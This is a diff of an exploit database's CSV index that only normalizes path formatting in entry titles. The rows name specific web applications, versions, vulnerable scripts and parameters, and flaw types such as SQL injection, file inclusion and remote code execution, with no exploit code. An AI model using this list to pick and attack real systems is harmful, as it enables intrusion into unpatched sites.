@@ -33861,7 +33862,7 @@ id,file,description,date,author,platform,type,port 33796,platforms/php/webapps/33796.txt,"Joomla! Component com_cb - 'cat' SQL Injection",2010-03-23,"DevilZ TM",php,webapps,0 33797,platforms/php/webapps/33797.txt,"Joomla! Component com_jresearch - 'Controller' Local File Inclusion",2010-03-24,"Chip d3 bi0s",php,webapps,0 33803,platforms/hardware/webapps/33803.txt,"ZTE WXV10 W300 - Multiple Vulnerabilities",2014-06-18,"Osanda Malith",hardware,webapps,0 -34141,platforms/php/webapps/34141.txt,"AneCMS 1.x - 'modules/blog/index.php' SQL Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 +34141,platforms/php/webapps/34141.txt,"AneCMS 1.x - '/modules/blog/index.php' SQL Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 33976,platforms/php/webapps/33976.html,"Saurus CMS 4.7 - 'edit.php' Cross-Site Scripting",2010-05-11,"High-Tech Bridge SA",php,webapps,0 33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0 33812,platforms/php/webapps/33812.txt,"Joomla! Component com_weblinks - 'id' SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps,0 @@ -33881,7 +33882,7 @@ id,file,description,date,author,platform,type,port 33834,platforms/php/webapps/33834.txt,"Vana CMS - 'Filename' Arbitrary File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0 33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Inclusions",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 33840,platforms/asp/webapps/33840.txt,"Ziggurat Farsi CMS - 'bck' Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps,0 -33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0 +33857,platforms/php/webapps/33857.txt,"e107 0.7.x - '/e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0 33997,platforms/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33998,platforms/php/webapps/33998.html,"Joomla! Component JComments 2.1 - 'ComntrNam' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - 'zero_transact_article.php' SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 @@ -33918,7 +33919,7 @@ id,file,description,date,author,platform,type,port 33913,platforms/php/webapps/33913.html,"osCommerce 3.0a5 - Local File Inclusion / HTML Injection",2010-04-30,"Jordi Chancel",php,webapps,0 33914,platforms/php/webapps/33914.txt,"4x CMS - 'login.php' Multiple SQL Injections",2010-03-21,cr4wl3r,php,webapps,0 33915,platforms/php/webapps/33915.txt,"Campsite 3.x - 'article_id' SQL Injection",2010-04-30,"Stefan Esser",php,webapps,0 -33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 - 'archives.cfm/search' Cross-Site Scripting",2010-05-03,MustLive,cfm,webapps,0 +33916,platforms/cfm/webapps/33916.txt,"Mango Blog 1.4.1 - '/archives.cfm/search' Cross-Site Scripting",2010-05-03,MustLive,cfm,webapps,0 33917,platforms/php/webapps/33917.txt,"Billwerx RC5.2.2 PL2 - 'primary_number' SQL Injection",2010-05-02,indoushka,php,webapps,0 33918,platforms/php/webapps/33918.txt,"CF Image Hosting Script 1.1 - 'upload.php' Arbitrary File Upload",2010-05-01,The.Morpheus,php,webapps,0 33919,platforms/php/webapps/33919.txt,"NolaPro Enterprise 4.0.5538 - Cross-Site Scripting / SQL Injection",2010-05-01,ekse,php,webapps,0 @@ -33965,7 +33966,7 @@ id,file,description,date,author,platform,type,port 34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0 34008,platforms/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0 34011,platforms/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",php,webapps,0 -34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - 'resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0 +34012,platforms/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - '/resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,php,webapps,0 34014,platforms/php/webapps/34014.txt,"Web 2.0 Social Network Freunde Community System - 'user.php' SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 34015,platforms/php/webapps/34015.txt,"SoftDirec 1.05 - 'delete_confirm.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0 34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - 'gallery.php?cfg_admin_path' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 @@ -33984,7 +33985,7 @@ id,file,description,date,author,platform,type,port 34062,platforms/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80 34038,platforms/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 < 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,php,webapps,0 34189,platforms/php/webapps/34189.txt,"Sphider Search Engine 1.3.6 - Multiple Vulnerabilities",2014-07-28,"Mike Manzotti",php,webapps,80 -34040,platforms/php/webapps/34040.txt,"RazorCMS 1.0 - 'admin/index.php' HTML Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 +34040,platforms/php/webapps/34040.txt,"RazorCMS 1.0 - '/admin/index.php' HTML Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34041,platforms/php/webapps/34041.txt,"Getsimple CMS 2.01 - 'components.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34042,platforms/php/webapps/34042.txt,"Ruubikcms 1.0.3 - 'index.php' Cross-Site Scripting",2010-05-24,"High-Tech Bridge SA",php,webapps,0 34043,platforms/php/webapps/34043.txt,"360 Web Manager 3.0 - 'webpages-form-led-edit.php' SQL Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 @@ -34001,7 +34002,7 @@ id,file,description,date,author,platform,type,port 34070,platforms/php/webapps/34070.txt,"Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps,0 34071,platforms/php/webapps/34071.txt,"Joomla! Component com_sar_news - 'id' SQL Injection",2010-06-02,LynX,php,webapps,0 34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0 -34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0 +34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - '/admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0 34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 34087,platforms/php/webapps/34087.txt,"Joomla! Component Youtube Gallery 4.1.7 - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 @@ -34020,21 +34021,21 @@ id,file,description,date,author,platform,type,port 34091,platforms/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 34092,platforms/jsp/webapps/34092.txt,"JForum 2.1.8 - 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",jsp,webapps,0 34095,platforms/php/webapps/34095.txt,"PonVFTP - 'login.php' SQL Injection",2010-01-15,S2K9,php,webapps,0 -34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x - 'manage/add_user.php?user_id' SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0 -34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x - 'manage/main.php?fld_path' Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",php,webapps,0 +34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x - '/manage/add_user.php?user_id' SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0 +34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x - '/manage/main.php?fld_path' Cross-Site Scripting",2010-06-06,"High-Tech Bridge SA",php,webapps,0 34155,platforms/php/webapps/34155.txt,"Ceica-GW - 'login.php' Cross-Site Scripting",2010-06-27,indoushka,php,webapps,0 34157,platforms/php/webapps/34157.txt,"Firebook - Multiple Cross-Site Scripting / Directory Traversal Vulnerabilities",2010-06-17,MustLive,php,webapps,0 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - 'showcasesearch.php?rowptem[template]' Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - 'showcase2search.php?rowptem[template]' Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0 -34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - 'addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 -34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - 'register.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 +34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - '/addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 +34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - '/register.php' Arbitrary File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection",2009-09-21,learn3r,php,webapps,0 34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster - Multiple Cross-Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic",php,webapps,0 34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2014-07-17,LiquidWorm,php,webapps,80 40296,platforms/php/webapps/40296.txt,"FreePBX 13.0.35 - Remote Command Execution",2016-08-29,0x4148,php,webapps,0 -34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - 'modules/blog/index.php' HTML Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 +34140,platforms/php/webapps/34140.txt,"AneCMS 1.x - '/modules/blog/index.php' HTML Injection",2010-06-11,"High-Tech Bridge SA",php,webapps,0 34113,platforms/php/webapps/34113.py,"Silverstripe CMS 2.4 - File Renaming Security Bypass",2010-06-09,"John Leitch",php,webapps,0 34105,platforms/php/webapps/34105.txt,"WordPress Plugin Gallery Objects 0.4 - SQL Injection",2014-07-18,"Claudio Viviani",php,webapps,80 34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager - 'target' Local File Inclusion",2010-06-07,"AnTi SeCuRe",php,webapps,0 @@ -34087,10 +34088,10 @@ id,file,description,date,author,platform,type,port 34216,platforms/php/webapps/34216.txt,"eBay Clone Script 2010 - 'showcategory.php' SQL Injection",2010-06-28,"L0rd CrusAd3r",php,webapps,0 34217,platforms/php/webapps/34217.txt,"Clix'N'Cash Clone 2010 - 'index.php' SQL Injection",2010-06-28,"L0rd CrusAd3r",php,webapps,0 34218,platforms/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,php,webapps,0 -34219,platforms/php/webapps/34219.txt,"CANDID - 'image/view.php?image_id' SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0 -34220,platforms/php/webapps/34220.txt,"CANDID - 'image/view.php?image_id' Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps,0 +34219,platforms/php/webapps/34219.txt,"CANDID - '/image/view.php?image_id' SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0 +34220,platforms/php/webapps/34220.txt,"CANDID - '/image/view.php?image_id' Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps,0 34221,platforms/asp/webapps/34221.txt,"Iatek PortalApp 3.3/4.0 - 'login.asp' Multiple Cross-Site Scripting Vulnerabilities",2010-06-29,"High-Tech Bridge SA",asp,webapps,0 -34222,platforms/php/webapps/34222.html,"Grafik CMS - 'admin.php' SQL Injection / Cross-Site Scripting",2010-06-29,"High-Tech Bridge SA",php,webapps,0 +34222,platforms/php/webapps/34222.html,"Grafik CMS - '/admin.php' SQL Injection / Cross-Site Scripting",2010-06-29,"High-Tech Bridge SA",php,webapps,0 34223,platforms/cgi/webapps/34223.txt,"Miyabi CGI Tools 1.02 - 'index.pl' Remote Command Execution",2010-06-29,"Marshall Whittaker",cgi,webapps,0 34224,platforms/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery / HTML Injection",2010-06-29,TurboBorland,multiple,webapps,0 34225,platforms/php/webapps/34225.txt,"TornadoStore 1.4.3 - SQL Injection / HTML Injection",2010-06-29,"Lucas Apa",php,webapps,0 @@ -34198,7 +34199,7 @@ id,file,description,date,author,platform,type,port 34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0 34393,platforms/php/webapps/34393.txt,"Joomla! Component com_jigsaw - 'Controller' Directory Traversal",2010-08-03,FL0RiX,php,webapps,0 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0 -34397,platforms/asp/webapps/34397.txt,"Activedition - 'activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0 +34397,platforms/asp/webapps/34397.txt,"Activedition - '/activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0 34497,platforms/php/webapps/34497.txt,"ViArt Helpdesk - 'reviews.php?category_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34498,platforms/php/webapps/34498.txt,"ViArt Helpdesk - 'forum.php?forum_id' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34400,platforms/php/webapps/34400.txt,"RaidenTunes - 'music_out.php' Cross-Site Scripting",2014-08-03,LiquidWorm,php,webapps,0 @@ -34207,7 +34208,7 @@ id,file,description,date,author,platform,type,port 34405,platforms/php/webapps/34405.txt,"PHP Stock Management System 1.02 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-08-25,"Ragha Deepthi K R",php,webapps,0 34408,platforms/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - Cross-Site Request Forgery",2014-08-25,"Rainer Giedat",multiple,webapps,80 34409,platforms/multiple/webapps/34409.rb,"ManageEngine Password Manager - MetadataServlet.dat SQL Injection (Metasploit)",2014-08-25,"Pedro Ribeiro",multiple,webapps,8020 -34410,platforms/php/webapps/34410.txt,"PHPFinance 0.6 - 'group.php' SQL Injection / HTML Injection",2010-08-05,skskilL,php,webapps,0 +34410,platforms/php/webapps/34410.txt,"PHPFinance 0.6 - '/group.php' SQL Injection / HTML Injection",2010-08-05,skskilL,php,webapps,0 34411,platforms/asp/webapps/34411.txt,"DT Centrepiece 4.5 - Cross-Site Scripting / Security Bypass",2010-08-05,"High-Tech Bridge SA",asp,webapps,0 34412,platforms/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34413,platforms/php/webapps/34413.txt,"DiamondList - '/user/main/update_settings?setting[site_title]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 @@ -34232,7 +34233,7 @@ id,file,description,date,author,platform,type,port 34443,platforms/php/webapps/34443.txt,"PaoLink 1.0 - 'scrivi.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34444,platforms/php/webapps/34444.txt,"RSSMediaScript - 'index.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 - Comment Topic Header Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps,0 -34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 - 'include/ajax/blogInfo.php?asd' Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps,0 +34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 - '/include/ajax/blogInfo.php?asd' Cross-Site Scripting",2009-08-31,Inj3ct0r,php,webapps,0 34447,platforms/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80 34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0 34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 @@ -34335,8 +34336,8 @@ id,file,description,date,author,platform,type,port 34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Inclusion / SQL Injection",2010-09-02,Inj3ct0r,php,webapps,0 34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",php,webapps,0 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0 -34610,platforms/php/webapps/34610.txt,"ZenPhoto 1.3 - 'zp-core/full-image.php?a' SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0 -34611,platforms/php/webapps/34611.txt,"ZenPhoto 1.3 - 'zp-core/admin.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-07,"Bogdan Calin",php,webapps,0 +34610,platforms/php/webapps/34610.txt,"ZenPhoto 1.3 - '/zp-core/full-image.php?a' SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0 +34611,platforms/php/webapps/34611.txt,"ZenPhoto 1.3 - '/zp-core/admin.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-07,"Bogdan Calin",php,webapps,0 34805,platforms/php/webapps/34805.txt,"StatsCode - Multiple Cross-Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0 34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 - 'vote.php' Cross-Site Scripting",2009-07-08,Moudi,php,webapps,0 @@ -34376,24 +34377,24 @@ id,file,description,date,author,platform,type,port 34652,platforms/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0 34653,platforms/php/webapps/34653.txt,"e107 0.7.23 - Multiple SQL Injections",2010-09-17,"High-Tech Bridge SA",php,webapps,0 34655,platforms/php/webapps/34655.txt,"Open Classifieds - Multiple Cross-Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps,0 -34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 - 'includes/video_ad.php?pic_id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 - '/includes/video_ad.php?pic_id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34657,platforms/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 - 'linkvideos_listing.php?category' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'templates/header1.php?id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b - '/templates/header1.php?id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34659,platforms/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'video_listing.php?key' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34660,platforms/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'embed.php?name' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'info.php?name' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'lyrics.php?id' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - 'adult/video_listing.php?key' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - '/adult/video_listing.php?key' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Inclusion",2014-09-15,Vulnerability-Lab,ios,webapps,0 34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Code Execution",2014-09-15,eF,php,webapps,80 34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - Cross-Site Request Forgery",2014-09-15,"William Costa",linux,webapps,8090 34673,platforms/php/webapps/34673.txt,"Tukanas Classifieds 1.0 - 'index.php' SQL Injection",2009-08-28,Moudi,php,webapps,0 -34674,platforms/php/webapps/34674.txt,"WebStatCaffe - 'stat/mostvisitpage.php?nodayshow' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34675,platforms/php/webapps/34675.txt,"WebStatCaffe - 'stat/visitorduration.php?nodayshow' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34676,platforms/php/webapps/34676.txt,"WebStatCaffe - 'stat/mostvisitpagechart.php?nopagesmost' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34677,platforms/php/webapps/34677.txt,"WebStatCaffe - 'stat/pageviewers.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34678,platforms/php/webapps/34678.txt,"WebStatCaffe - 'stat/pageviewerschart.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34679,platforms/php/webapps/34679.txt,"WebStatCaffe - 'stat/referer.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34674,platforms/php/webapps/34674.txt,"WebStatCaffe - '/stat/mostvisitpage.php?nodayshow' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34675,platforms/php/webapps/34675.txt,"WebStatCaffe - '/stat/visitorduration.php?nodayshow' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34676,platforms/php/webapps/34676.txt,"WebStatCaffe - '/stat/mostvisitpagechart.php?nopagesmost' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34677,platforms/php/webapps/34677.txt,"WebStatCaffe - '/stat/pageviewers.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34678,platforms/php/webapps/34678.txt,"WebStatCaffe - '/stat/pageviewerschart.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 +34679,platforms/php/webapps/34679.txt,"WebStatCaffe - '/stat/referer.php?date' Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34680,platforms/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Unauthenticated Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",hardware,webapps,0 34681,platforms/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",php,webapps,0 34682,platforms/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,ios,webapps,8080 @@ -34405,7 +34406,7 @@ id,file,description,date,author,platform,type,port 34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Cross-Site Scripting",2009-08-27,"599eme Man",php,webapps,0 34694,platforms/php/webapps/34694.txt,"Clipbucket 1.7.1 - Multiple SQL Injections",2009-07-24,Qabandi,php,webapps,0 34699,platforms/php/webapps/34699.txt,"OpenText LiveLink 9.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-09-23,"Alejandro Ramos",php,webapps,0 -34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s - 'index.php' Local File Inclusion / Cross-Site Scripting",2009-07-24,u.f.,php,webapps,0 +34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s - '/index.php' Local File Inclusion / Cross-Site Scripting",2009-07-24,u.f.,php,webapps,0 34701,platforms/php/webapps/34701.txt,"SkaLinks 1.5 - 'cat' Multiple Cross-Site Scripting Vulnerabilities",2009-07-24,Moudi,php,webapps,0 34702,platforms/php/webapps/34702.txt,"TurnkeySetup Net Marketing 6.0 - 'faqs.php' Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0 34703,platforms/php/webapps/34703.txt,"Million Dollar Pixel Ads - Cross-Site Scripting / SQL Injection",2009-07-24,Moudi,php,webapps,0 @@ -34430,8 +34431,8 @@ id,file,description,date,author,platform,type,port 34826,platforms/php/webapps/34826.html,"OPEN IT OverLook 5 - 'title.php' Cross-Site Scripting",2010-10-08,"Anatolia Security",php,webapps,0 34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Persistent Cross-Site Scripting",2014-09-20,"Brij Kishore Mishra",php,webapps,0 34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injections",2014-09-20,BillV-Lists,php,webapps,0 -34730,platforms/php/webapps/34730.txt,"DragDropCart - 'assets/js/ddcart.php?sid' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34731,platforms/php/webapps/34731.txt,"DragDropCart - 'includes/ajax/getstate.php?prefix' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34730,platforms/php/webapps/34730.txt,"DragDropCart - '/assets/js/ddcart.php?sid' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34731,platforms/php/webapps/34731.txt,"DragDropCart - '/includes/ajax/getstate.php?prefix' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34732,platforms/php/webapps/34732.txt,"DragDropCart - 'index.php' search Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34733,platforms/php/webapps/34733.txt,"DragDropCart - 'search.php?search' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34734,platforms/php/webapps/34734.txt,"DragDropCart - 'login.php' redirect Parameter Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 @@ -34473,7 +34474,7 @@ id,file,description,date,author,platform,type,port 34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 - 'name' HTML Injection",2010-09-28,"Veerendra G.G",php,webapps,0 34785,platforms/php/webapps/34785.txt,"PHPMyFAQ 2.6.x - 'index.php' Cross-Site Scripting",2010-09-28,"Yam Mesicka",php,webapps,0 34786,platforms/php/webapps/34786.txt,"eCardMAX - Multiple Cross-Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0 -34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - 'manager/index.php?modahsh' Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0 +34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - '/manager/index.php?modahsh' Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0 34788,platforms/php/webapps/34788.txt,"MODx manager - '/controllers/default/resource/tvs.php?class_key' Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34790,platforms/php/webapps/34790.txt,"Pluck CMS 4.6.3 - 'cont1' HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0 @@ -34547,7 +34548,7 @@ id,file,description,date,author,platform,type,port 35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0 34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - '/riddles/results.php?searchQuery' Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - '/riddles/list.php?catid' SQL Injection",2009-08-20,Moudi,php,webapps,0 